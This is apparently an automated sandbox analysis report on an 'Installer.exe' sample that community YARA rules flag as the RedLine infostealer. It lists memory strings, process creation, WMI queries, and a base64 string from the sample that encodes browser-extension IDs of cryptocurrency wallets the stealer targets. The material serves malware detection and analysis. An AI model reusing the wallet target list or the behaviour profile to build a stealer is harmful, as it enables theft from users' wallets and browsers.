                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000069E7000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000069E7000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.0000000006782000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Responseon
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000069E7000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066DF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066DF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.0000000006782000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Responseon
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4y/
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000069E7000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                      Source: AppLaunch.exe, 00000002.00000002.381215531.0000000007684000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.000000000694E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: Installer.exe, 00000000.00000003.304751719.0000000001432000.00000040.00001000.00020000.00000000.sdmp, Installer.exe, 00000000.00000002.306753398.00000000013D5000.00000004.00000010.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.370528626.00000000041C2000.00000020.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: AppLaunch.exe, 00000002.00000002.381215531.0000000007684000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.000000000694E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: AppLaunch.exe, 00000002.00000002.381215531.0000000007684000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.000000000694E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000069DA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000068C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.381215531.0000000007684000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.000000000694E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: AppLaunch.exe, 00000002.00000002.381215531.0000000007684000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.000000000694E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000069DA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000068C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.381215531.0000000007684000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.000000000694E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000069DA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000068C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.381215531.0000000007684000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.000000000694E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                      Source: AppLaunch.exe, 00000002.00000002.381215531.0000000007684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000069DA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000068C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.381215531.0000000007684000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.000000000694E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000069DA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000068C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.381215531.0000000007684000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.000000000694E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: Installer.exe, 00000000.00000002.306845382.000000000163A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 0.2.Installer.exe.13d4614.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0.3.Installer.exe.1430000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 2.2.AppLaunch.exe.41c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: Installer.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, 32BIT_MACHINE
                      Source: 0.2.Installer.exe.13d4614.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0.3.Installer.exe.1430000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 2.2.AppLaunch.exe.41c0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: C:\Users\user\Desktop\Installer.exeCode function: 0_2_001216AB0_2_001216AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0491F7C82_2_0491F7C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0491F3682_2_0491F368
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_09BA2B502_2_09BA2B50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_09BA20182_2_09BA2018
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_09BA20092_2_09BA2009
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_09BAC2A82_2_09BAC2A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_09BA55382_2_09BA5538
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_09BA45282_2_09BA4528
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_09BA45182_2_09BA4518
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_09BA14B82_2_09BA14B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_09BA14C82_2_09BA14C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_09BA07682_2_09BA0768
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_09BAE1C82_2_09BAE1C8
                      Source: Installer.exe, 00000000.00000003.304751719.0000000001432000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHarpists.exe< vs Installer.exe
                      Source: C:\Users\user\Desktop\Installer.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: sfc.dllJump to behavior
                      Source: Installer.exeStatic PE information: Number of sections : 20 > 10
                      Source: Installer.exeStatic PE information: Section: .reloc ZLIB complexity 1.5
                      Source: Installer.exeVirustotal: Detection: 38%
                      Source: C:\Users\user\Desktop\Installer.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Installer.exe C:\Users\user\Desktop\Installer.exe
                      Source: C:\Users\user\Desktop\Installer.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Installer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                      Source: C:\Users\user\Desktop\Installer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/1@0/1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: 0.3.Installer.exe.1430000.0.unpack, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
                      Source: 2.2.AppLaunch.exe.41c0000.0.unpack, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2F